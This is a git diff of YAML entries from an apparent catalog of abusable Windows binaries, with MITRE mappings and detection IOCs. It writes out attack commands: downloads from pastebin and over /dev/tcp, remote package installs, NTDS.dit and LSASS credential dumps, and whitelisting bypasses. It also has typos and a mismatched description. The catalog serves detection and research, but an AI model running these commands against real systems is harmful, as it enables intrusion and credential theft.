- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
||||||
|
Description: Binary file used by .NET to compile vb code to .exe
|
||||||
|
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||||
|
Category: Compile
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
|
OperatingSystem: Windows 10,7
|
||||||
|
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
||||||
|
Description: Description of the second command
|
||||||
|
Usecase: A description of the usecase
|
||||||
|
Category: Compile
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
|
OperatingSystem: Windows 10,7
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Lior Adar
|
||||||
|
Handle:
|
||||||
|
- Person: Hai Vaknin(Lux)
|
||||||
|
Handle:
|
||||||
|
---
|
26
yml/OSBinaries/Wuauclt.yml
Normal file
26
yml/OSBinaries/Wuauclt.yml
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
---
|
||||||
|
Name: wuauclt.exe
|
||||||
|
Description: Windows Update Client
|
||||||
|
Author: 'David Middlehurst'
|
||||||
|
Created: '2020-09-23'
|
||||||
|
Commands:
|
||||||
|
- Command: wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer
|
||||||
|
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
|
||||||
|
Usecase: Execute dll via attach/detach methods
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1085
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\wuauclt.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: wuauclt run with a parameter of a DLL path
|
||||||
|
Resources:
|
||||||
|
- Link: https://dtm.uk/wuauclt/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: David Middlehurst
|
||||||
|
Handle: '@dtmsecurity'
|
||||||
|
---
|
@ -20,6 +20,14 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||||
|
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
|
||||||
|
Usecase: Download file from Internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\xwizard.exe
|
- Path: C:\Windows\System32\xwizard.exe
|
||||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||||
@ -32,6 +40,7 @@ Resources:
|
|||||||
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||||
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
|
- Link: https://twitter.com/notwhickey/status/1306023056847110144
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
@ -39,4 +48,6 @@ Acknowledgement:
|
|||||||
Handle: '@NickTyrer'
|
Handle: '@NickTyrer'
|
||||||
- Person: harr0ey
|
- Person: harr0ey
|
||||||
Handle: '@harr0ey'
|
Handle: '@harr0ey'
|
||||||
|
- Person: Wade Hickey
|
||||||
|
Handle: '@notwhickey'
|
||||||
---
|
---
|
||||||
|
@ -16,6 +16,8 @@ Full_Path:
|
|||||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
|
- Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
|
||||||
|
- Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
@ -29,9 +29,12 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
|
- Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
|
||||||
- Link: https://twitter.com/bohops/status/980659399495741441
|
- Link: https://twitter.com/bohops/status/980659399495741441
|
||||||
|
- Link: https://twitter.com/JohnLaTwC/status/1223292479270600706
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
- Person: Daniel Bohannon
|
- Person: Daniel Bohannon
|
||||||
Handle: '@danielbohannon'
|
Handle: '@danielbohannon'
|
||||||
|
- Person: John Lambert
|
||||||
|
Handle: '@JohnLaTwC'
|
||||||
---
|
---
|
@ -1,31 +0,0 @@
|
|||||||
---
|
|
||||||
Name: Slmgr.vbs
|
|
||||||
Description: Script used to manage windows license activation
|
|
||||||
Author: 'Oddvar Moe'
|
|
||||||
Created: '2018-05-25'
|
|
||||||
Commands:
|
|
||||||
- Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
|
|
||||||
Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code
|
|
||||||
Usecase: Proxy execution
|
|
||||||
Category: Execute
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1216
|
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
||||||
OperatingSystem: Windows 10
|
|
||||||
Full_Path:
|
|
||||||
- Path: C:\Windows\System32\slmgr.vbs
|
|
||||||
- Path: C:\Windows\SysWOW64\slmgr.vbs
|
|
||||||
Code_Sample:
|
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
|
||||||
Detection:
|
|
||||||
- IOC:
|
|
||||||
Resources:
|
|
||||||
- Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
|
||||||
- Link: https://www.youtube.com/watch?v=3gz1QmiMhss
|
|
||||||
Acknowledgement:
|
|
||||||
- Person: Matt Nelson
|
|
||||||
Handle: '@enigma0x3'
|
|
||||||
- Person: Casey Smith
|
|
||||||
Handle: '@subtee'
|
|
||||||
---
|
|
@ -4,14 +4,6 @@ Description: Script used for manage Windows RM settings
|
|||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
|
|
||||||
Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
|
|
||||||
Usecase: Proxy execution
|
|
||||||
Category: Execute
|
|
||||||
Privileges: User
|
|
||||||
MitreID: T1216
|
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
|
||||||
OperatingSystem: Windows 10
|
|
||||||
- Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
|
- Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
|
||||||
Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
|
Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
|
||||||
Usecase: Proxy execution
|
Usecase: Proxy execution
|
||||||
|
34
yml/OtherMSBinaries/Agentexecutor.yml
Normal file
34
yml/OtherMSBinaries/Agentexecutor.yml
Normal file
@ -0,0 +1,34 @@
|
|||||||
|
---
|
||||||
|
Name: AgentExecutor.exe
|
||||||
|
Description: Intune Management Extension included on Intune Managed Devices
|
||||||
|
Author: 'Eleftherios Panos'
|
||||||
|
Created: '23/07/2020'
|
||||||
|
Commands:
|
||||||
|
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
|
||||||
|
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
|
||||||
|
Usecase: Execute unsigned powershell scripts
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||||
|
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||||
|
Usecase: Execute a provided EXE
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
|
Resources:
|
||||||
|
- Link:
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Eleftherios Panos
|
||||||
|
Handle: '@lefterispan'
|
||||||
|
---
|
52
yml/OtherMSBinaries/Coregen.yml
Normal file
52
yml/OtherMSBinaries/Coregen.yml
Normal file
@ -0,0 +1,52 @@
|
|||||||
|
---
|
||||||
|
Name: coregen.exe
|
||||||
|
Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
|
||||||
|
Author: Martin Sohn Christensen
|
||||||
|
Created: 2020-10-09
|
||||||
|
Commands:
|
||||||
|
- Command: coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name
|
||||||
|
Description: Loads the target .DLL in arbitrary path specified with /L.
|
||||||
|
Usecase: Execute DLL code
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1055
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||||
|
OperatingSystem: Windows
|
||||||
|
- Command: coregen.exe dummy_assembly_name
|
||||||
|
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
|
||||||
|
Usecase: Execute DLL code
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1055
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||||
|
OperatingSystem: Windows
|
||||||
|
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
|
||||||
|
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
|
||||||
|
Usecase: Execute DLL code
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
|
||||||
|
- IOC: coregen.exe loading .dll file not named coreclr.dll
|
||||||
|
- IOC: coregen.exe command line containing -L or -l
|
||||||
|
- IOC: coregen.exe command line containing unexpected/invald assembly name
|
||||||
|
- IOC: coregen.exe application crash by invalid assembly name
|
||||||
|
Resources:
|
||||||
|
- Link: https://www.youtube.com/watch?v=75XImxOOInU
|
||||||
|
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Nicky Tyrer
|
||||||
|
Handle:
|
||||||
|
- Person: Evan Pena
|
||||||
|
Handle:
|
||||||
|
- Person: Casey Erikson
|
||||||
|
Handle:
|
||||||
|
---
|
26
yml/OtherMSBinaries/DefaultPack.yml
Normal file
26
yml/OtherMSBinaries/DefaultPack.yml
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
---
|
||||||
|
Name: DefaultPack.EXE
|
||||||
|
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
|
||||||
|
Author: '@checkymander'
|
||||||
|
Created: '2020-10-01'
|
||||||
|
Commands:
|
||||||
|
- Command: DefaultPack.EXE /C:"process.exe args"
|
||||||
|
Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
|
||||||
|
Usecase: Can be used to execute stagers, binaries, and other malicious commands.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: DefaultPack.EXE spawned an unknown process
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/checkymander/status/1311509470275604480.
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: checkymander
|
||||||
|
Handle: '@checkymander'
|
||||||
|
---
|
42
yml/OtherMSBinaries/Dotnet.yml
Normal file
42
yml/OtherMSBinaries/Dotnet.yml
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
---
|
||||||
|
Name: Dotnet.exe
|
||||||
|
Description: dotnet.exe comes with .NET Framework
|
||||||
|
Author: 'felamos'
|
||||||
|
Created: '2019-11-12'
|
||||||
|
Commands:
|
||||||
|
- Command: dotnet.exe [PATH_TO_DLL]
|
||||||
|
Description: dotnet.exe will execute any dll even if applocker is enabled.
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 7 and up with .NET installed
|
||||||
|
- Command: dotnet.exe [PATH_TO_DLL]
|
||||||
|
Description: dotnet.exe will execute any DLL.
|
||||||
|
Usecase: Execute DLL
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 7 and up with .NET installed
|
||||||
|
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
|
||||||
|
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10 with .NET Core installed
|
||||||
|
Full_Path:
|
||||||
|
- Path: 'C:\Program Files\dotnet\dotnet.exe'
|
||||||
|
Detection:
|
||||||
|
- IOC: dotnet.exe spawned an unknown process
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/_felamos/status/1204705548668555264
|
||||||
|
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
|
||||||
|
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: felamos
|
||||||
|
Handle: '@_felamos'
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
---
|
26
yml/OtherMSBinaries/Ntdsutil.yml
Normal file
26
yml/OtherMSBinaries/Ntdsutil.yml
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
---
|
||||||
|
Name: ntdsutil.exe
|
||||||
|
Description: Command line utility used to export Actove Directory.
|
||||||
|
Author: 'Tony Lambert'
|
||||||
|
Created: '2020-01-10'
|
||||||
|
Commands:
|
||||||
|
- Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
|
||||||
|
Description: Dump NTDS.dit into folder
|
||||||
|
Usecase: Dumping of Active Directory NTDS.dit database
|
||||||
|
Category: Dump
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1003
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\ntdsutil.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: ntdsutil.exe with command line including "ifm"
|
||||||
|
Resources:
|
||||||
|
- Link: https://adsecurity.org/?p=2398#CreateIFM
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Sean Metcalf
|
||||||
|
Handle: '@PyroTek3'
|
||||||
|
---
|
@ -6,15 +6,15 @@ Created: '2018-05-25'
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: sqldumper.exe 464 0 0x0110
|
- Command: sqldumper.exe 464 0 0x0110
|
||||||
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
|
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
|
||||||
Usecase: Dump process uisng PID.
|
Usecase: Dump process using PID.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: sqldumper.exe 540 0 0x01100:40
|
- Command: sqldumper.exe 540 0 0x01100:40
|
||||||
Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
|
Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
|
||||||
Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID.
|
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
|
@ -1,9 +1,65 @@
|
|||||||
---
|
---
|
||||||
Name: Update.exe
|
Name: Update.exe
|
||||||
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
|
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
|
||||||
Author: 'Mr.Un1k0d3r'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2019-06-26'
|
Created: '2019-06-26'
|
||||||
Commands:
|
Commands:
|
||||||
|
- Command: Update.exe --download [url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
||||||
|
Usecase: Download binary
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --update=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --update=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Application Whitelisting Bypass
|
Usecase: Application Whitelisting Bypass
|
||||||
@ -12,6 +68,22 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -21,12 +93,25 @@ Commands:
|
|||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe'
|
- Path: '%localappdata%\Microsoft\Teams\update.exe'
|
||||||
|
Code_Sample:
|
||||||
|
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Update.exe spawned an unknown process
|
- IOC: Update.exe spawned an unknown process
|
||||||
Resources:
|
Resources:
|
||||||
|
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
|
||||||
|
- Link: https://twitter.com/reegun21/status/1144182772623269889
|
||||||
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
||||||
|
- Link: https://twitter.com/reegun21/status/1291005287034281990
|
||||||
|
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
||||||
|
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
||||||
|
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
|
||||||
|
- Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
- Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave)
|
||||||
|
Handle: '@reegun21'
|
||||||
- Person: Mr.Un1k0d3r
|
- Person: Mr.Un1k0d3r
|
||||||
Handle: '@MrUn1k0d3r'
|
Handle: '@MrUn1k0d3r'
|
||||||
|
- Person: Adam
|
||||||
|
Handle: '@Hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -20,6 +20,22 @@ Commands:
|
|||||||
MitreID: T1202
|
MitreID: T1202
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||||
OperatingSystem: Windows 10, Windows 19 Server
|
OperatingSystem: Windows 10, Windows 19 Server
|
||||||
|
- Command: wsl.exe --exec bash -c 'cat file'
|
||||||
|
Description: Cats /etc/shadow file as root
|
||||||
|
Usecase: Performs execution of arbitrary Linux commands.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1202
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||||
|
OperatingSystem: Windows 10, Windows 19 Server
|
||||||
|
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||||||
|
Description: Downloads file from 192.168.1.10
|
||||||
|
Usecase: Download file
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1202
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||||
|
OperatingSystem: Windows 10, Windows 19 Server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wsl.exe
|
- Path: C:\Windows\System32\wsl.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
@ -33,4 +49,6 @@ Acknowledgement:
|
|||||||
Handle: '@aionescu'
|
Handle: '@aionescu'
|
||||||
- Person: Matt
|
